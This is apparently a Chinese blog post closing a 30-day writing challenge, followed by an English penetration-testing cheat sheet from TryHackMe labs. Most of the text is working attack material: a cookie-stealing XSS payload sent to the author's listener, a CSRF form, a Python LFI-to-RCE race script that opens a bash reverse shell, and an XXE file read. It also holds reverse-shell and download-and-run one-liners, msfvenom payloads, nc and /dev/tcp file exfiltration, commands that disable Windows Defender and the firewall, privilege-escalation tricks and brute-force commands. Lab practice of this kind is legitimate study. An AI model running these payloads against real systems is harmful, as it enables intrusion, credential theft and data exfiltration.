終於到了最後一天了,感覺這陣子打了好多好多的靶機哦,希望過去的這些文章可以對大家有一些幫助。非常感謝隊友的提醒與鼓勵,我才有辦法撐過雙主題的 30 天 QQ,也非常感謝飛飛贊助給我 TryHackMe 的帳號。
另外,我也有將過去打過的各種題型與內容整理成了 Cheat Sheet 可以供大家參考,不過為了可以快速的 Ctrl + F
搜尋到關鍵字,所以我的內容是寫英文ㄉ,我也會將過去以及未來練習的所有資源放置於我的 Github 上,供大家參考!再次感謝看到最後一篇的大家!
-A
: Enable OS detection, version detection, script scanning, and traceroute
-p-
: Scan all ports
-p 1000-9999
: Scan ports from 1000 to 9999
rustscan -a 10.10.166.15
-r 1-65535
: Port range from 1 to 65535
-a
: Do all simple enumeration
ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-20000.txt -u http://{domain.name}/ -H "Host: FUZZ.{domain.name}" -fs {normal_size}
/usr/share/dnsrecon/subdomains-top1mil.txt
<script>new Image().src="http://{my_ip}:1234/"+document.cookie</script>
nc -l 1234
<!-- CSRF proof of concept: a hidden form that an attacker page submits on the
     victim's behalf. The browser attaches the victim's session cookie, so
     /change_pass.php receives a password change the user never requested.
     The last line calls submit() through a freshly created form because this
     form has an <input name="submit">, which shadows the form's own submit
     method. Defences: a per-session anti-CSRF token checked server-side,
     SameSite cookies, and re-authentication before a password change. -->
<form id="myForm" name="myForm" action="/change_pass.php" method="POST">
<input type=hidden name="password" id="password" value="meowmeow"/>
<input type=hidden name="confirm_password" id="confirm_password" value="meowmeow"/>
<input type=hidden name="submit" id="submit" value="submit"/>
<script>document.createElement('form').submit.call(document.getElementById('myForm'))</script>
/var/log/apache2/access.log
/cgi-bin/*.sh
() { :;}; echo; /usr/bin/id
to User-Agent
C:\inetpub\wwwroot
/manager/status/all
/admin/dashboard
/..;/
/manager/status/..;/html/upload
system
echo passthru("whoami")
echo shell_exec("whoami")
echo exec("whoami")
php://filter/convert.base64-encode/resource=meow.php
/var/lib/php/sessions/sess_{sess_name}
import grequests
# LFI -> RCE race through PHP's session.upload_progress feature.
# What the loop below does: a multipart POST carrying a
# PHP_SESSION_UPLOAD_PROGRESS field makes PHP store that field's value in the
# session file named by the PHPSESSID cookie; a concurrent GET hands that
# session file's path to the vulnerable `file` parameter so it is included
# while the entry still exists (PHP normally removes the progress entry once
# the upload completes, hence the retry loop).
# Defender notes: the chain needs both an include on a user-controlled path
# and session.upload_progress left enabled (it is on by default in most
# php.ini templates — confirm for the target build); validating the include
# path or setting session.upload_progress.enabled=0 removes the primitive.
# Detection: POSTs with a PHP_SESSION_UPLOAD_PROGRESS field paired with
# requests whose `file` parameter points into the session directory.
sess_name = 'meowmeow'  # attacker-chosen PHPSESSID; PHP creates the file on first use
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'  # common session.save_path; adjust if the target differs
base_url = 'http://{target-domain}/{target-path/randylogs.php}'  # placeholder, fill in
param = "file"  # name of the parameter passed to include()
# code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/{domain}/{port} 0>&1'");'''  # {domain}/{port} are placeholders
while True:
    # Both requests are issued together so the GET can land while the
    # large upload is still being processed.
    req = [grequests.post(base_url,
                          files={'f': "A"*0xffff},
                          data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
                          cookies={'PHPSESSID': sess_name}),
           grequests.get(f"{base_url}?{param}={sess_path}")]
    result = grequests.map(req)
    # "pwned" in the response means the session file was included, i.e. the race was won.
    if "pwned" in result[1].text:
        print(result[1].text)
        break
// XXE test document: the inline DTD declares external entity `b` as the
// contents of /etc/passwd and <search> references it, so a parser that
// resolves external entities reflects the file in its output.
// Defender side: disable DTD processing / external entity resolution in the
// XML parser (the setting is parser-specific); input filtering alone is not
// a reliable fix.
var xml = '' +
    '<?xml version="1.0" encoding="UTF-8"?>\n' +
    '<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>\n' +
    '<root>' +
    '<name>' + "0" + '</name>' +
    '<search>' + "&b;" + '</search>' +
    '</root>';
jar -cvf cmd.war cmd.jsp
and upload to Tomcat admin
/etc/knockd.conf
nc
port several times to knock
WPScan
wpscan --url {URL} --enumerate p,t,u --plugins-detection aggressive -t 30
Enum user
http://{ip}/index.php/?author=1
LIMIT 0,1
, LIMIT 1,1
, LIMIT 2,1
...
SUBSTRING("ABC",1,1)
A
SUBSTRING("ABC",2,1)
B
ASCII("A")
65
concat(1,':',2)
1:2
select schema_name from information_schema.schemata
select table_name from information_schema.tables where table_schema='{db_name}'
select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{db_name}'
select concat({username},':',{password}) from {db_name}.{password}
select concat(user,':',password) from mysql.user
mysqldump -u {username} -h localhost -p {dbname} > a.sql
find / -iname {file_name} -print 2>/dev/null
du -a 2>/dev/null | grep {file_name}
tar cf - $PWD 2>/dev/null | tar tvf - | grep {file_name}
dir /a
dir {file_name} /s /p
nc -nvlp {port}
nc -vlk {port}
rlwrap nc -nvlp
bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'
/usr/bin/wget -O - {ip:port}/{file} | /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
perl -e 'exec "/bin/bash";'
shell/reverse_tcp
multi/handler
to receive
shell_reverse_tcp
nc
to receive
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx
msfvenom -p windows/shell/reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f exe > shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe -o shellx64.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi
msiexec /quiet /i shellx64.msi
powershell iex (New-Object Net.WebClient).DownloadString('http://{my_ip}:{http_port}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {my_ip} -Port {shell_port}
python3 -m http.server
sudo
to get
80 port
wget {my_ip}:{port}/{file_name} -O {path_to_output}
curl -o {path_to_output} http
nc -l -p {attacker_port} > {file}
nc {attacker_ip} {attacker_port} < {file}
cat {file} > /dev/tcp/{ip}/{port}
python3 -m http.server
wget
, curl
, iwr
is alias for Invoke-WebRequest
Invoke-WebRequest http://{my_ip}:{my_port}/{file} -outFile {file_name}
-UseBasicParsing
certutil -urlcache -f {URL} {File_name}
impacket-smbserver meow .
-smb2support
copy \\{IP}\meow\(unknown) (unknown)
lcab -r {dir} {file.cab}
expand {file.cab} -F:* {Extract path}
C:\Windows\Temp
redis-cli -h {ip}
config set dir "/var/www/html"
config set dbfilename meow.php
set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"
save
impacket-mssqlclient -p {port} {UserID}@{IP} -windows-auth
exec xp_cmdshell '{Command}'
nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
hydra -L sids-oracle.txt -s 1521 {IP} oracle-sid
tnscmd10g status --10G -p {port} -h {IP}
./odat all -s {IP} -p {PORT} -d {SID}
--accounts-file
, --accounts-files
odat-libc2.12-x86_64 ./odat-libc2.12-x86_64 dbmsscheduler -U {Username} -P {Password} -d {SID} -s {IP} --sysdba --exec "{command}"
winexe -U '{username}' //{ip} cmd.exe
impacket-smbexec '{username}:{password}'@{ip}
impacket-psexec '{username}:{password}'@{ip}
PGPASSWORD="{PASSWORD}" pg_dump {DB_NAME} > test.dump
Scan the system to find what can be used for privilege escalation
python -c "import sys;print(sys.path)"
import pty
pty.spawn("/bin/bash")
$PATH
PATH=/my/fake/path:$PATH ./binary
tar
Wildcard
echo "bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'" > shell.sh
chmod 777 shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
doas.conf
permit nopass {user} as {root} cmd {binary}
doas {binary}
and it will run as root
/.dockerenv
sudo -l
cat /etc/crontab
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
sudo -u#-1 binary
getcap -r / 2>/dev/null
send_and_execute.py
guest
ms15-051x64.exe whoami
SeImpersonate
or SeAssignPrimaryToken
by whoami /priv
JuicyPotato.exe -l 1337 -p shell7878.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
-c
(Include curly brackets)
-p
Exe Program
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi
msiexec /quiet /i shellx64.msi
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
Set-MpPreference -DisableRealtimeMonitoring $true
Uninstall-WindowsFeature -Name Windows-Defender -WhatIf
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
powershell -c Get-MpComputerStatus
AntivirusEnabled
is True
or False
systeminfo
windows-exploit-suggester.py --update
windows-exploit-suggester.py --database {Database file} --systeminfo {systeminfofile}
systeminfo
python3 wesng.py --update
python3 wesng.py {systeminfofile}
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
netstat -ano
netstat -an | findstr "LISTENING"
tasklist
icacls
/reset
reset the permissions to their parent's
cpau -u {user_name} -p {password} -ex C:\{abs_exe_path} -LWP
hydra -l {username} -P {path_to_wordlist} ssh://{ip_address}
hydra -l {username} -P {path_to_wordlist} {domain_name_without http/s} http{s}-post-form "{/{path}}:username=^USER^&password=^PASS^&data=data:{string_if_fail}"
/etc/shadow
samdump2 system sam > j.txt
john {file} --wordlist={wordlist}
hashcat -m {mode} {hashes.txt} {wordlist.txt}
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
xfreerdp +drives /u:{username} /v:{ip}:{port}
ls
get {file_name}
put {file_name}
wget -r 'ftp://{ip}/{path}/'
.gz
gunzip {filename.gz}
sudo tcpdump -i tun0 icmp
./chisel server -p {listen_port} --reverse
./chisel client {Remote_host}:{listen_port} R:{forward_port_at_attacker}:127.0.0.1:{forward_port}
127.0.0.1:8888
, we need to forward it to our attack machine's 127.0.0.1:8888
./chisel server -p 9999 --reverse
./chisel client 10.10.16.35:9999 R:8888:127.0.0.1:8888
ssh -L {forward_port}:127.0.0.1:{forward_port} {remote_user}@{remote_ip} -p {ssh_port} -N -v -v
10.87.87.87
run 5555
on the remote host, and port 2222 is open
for SSH, we can use the following command to forward 5555
to our local 5555
ssh -L 5555:127.0.0.1:5555 demo@10.87.87.87 -p 2222 -N -v -v
file {file_name}
binwalk {file_name}
xxd {file_name}
foremost {file_name}
dd if={input_file} bs=1 skip={skip_offset} of={outfile}